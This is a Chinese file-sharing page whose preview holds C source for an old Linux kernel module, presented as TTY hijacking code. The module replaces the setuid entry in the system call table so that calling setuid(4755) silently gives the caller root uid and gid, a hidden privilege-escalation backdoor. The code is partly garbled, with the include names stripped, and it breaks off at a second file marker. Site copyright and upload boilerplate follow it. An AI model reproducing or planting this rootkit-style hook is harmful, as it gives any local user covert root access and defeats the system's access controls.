首页 利用linux内核模块实现TTY hijacking dfg

利用linux内核模块实现TTY hijacking dfg

举报
开通vip

利用linux内核模块实现TTY hijacking dfg利用linux内核模块实现TTY hijacking dfg #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef N...

利用linux内核模块实现TTY hijacking dfg
利用linux内核模块实现TTY hijacking dfg #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef NEED_VERSION static char kernel_version[] = UTS_RELEASE; #endif static inline _syscall1(int, setuid, uid_t, uid);/*用_syscall这个系统调用宏来构 建setuid调用*/ extern void *sys_call_table[];/*调出系统调用表*/ void *original_setuid; /*原来的setuid*/ extern int hacked_setuid(uid_t uid)/*我们要替换的setuid*/ { int i; if(uid == 4755) { current->uid = current->euid = current->gid = current->egid = 0; /*使当前进程的uid,euid,gid,egid为零*/ return 0; } sys_call_table[SYS_setuid] = original_setuid;/*保存原调用*/ i = setuid(uid); sys_call_table[SYS_setuid] = hacked_setuid;/*替换调用!*/ if(i == -1) return -errno; else return i; } int init_module(void) /*加载*/ { original_setuid = sys_call_table[SYS_setuid]; sys_call_table[SYS_setuid] = hacked_setuid; return 0; } void cleanup_module(void) /*卸载*/ { sys_call_table[SYS_setuid] = original_setuid; } <++> linspy/linspy.c int errno; #include #include
本文档为【利用linux内核模块实现TTY hijacking dfg】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
该文档来自用户分享,如有侵权行为请发邮件ishare@vip.sina.com联系网站客服,我们会及时删除。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
下载需要: 免费 已有0 人下载
最新资料
资料动态
专题动态
is_977556
暂无简介~
格式:doc
大小:14KB
软件:Word
页数:0
分类:
上传时间:2018-04-11
浏览量:6